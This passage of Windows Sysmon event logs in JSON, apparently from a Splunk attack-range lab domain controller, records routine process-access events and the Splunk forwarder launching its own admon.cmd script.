{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.736\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010F39C0500}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.736","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010F39C0500}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.847\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-0010079F0500}\r\nProcessId: 3308\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.847","ProcessGuid":"{41C8662E-1FF7-5F25-0000-0010079F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010079F0500}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010079F0500}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010079F0500}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010079F0500}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 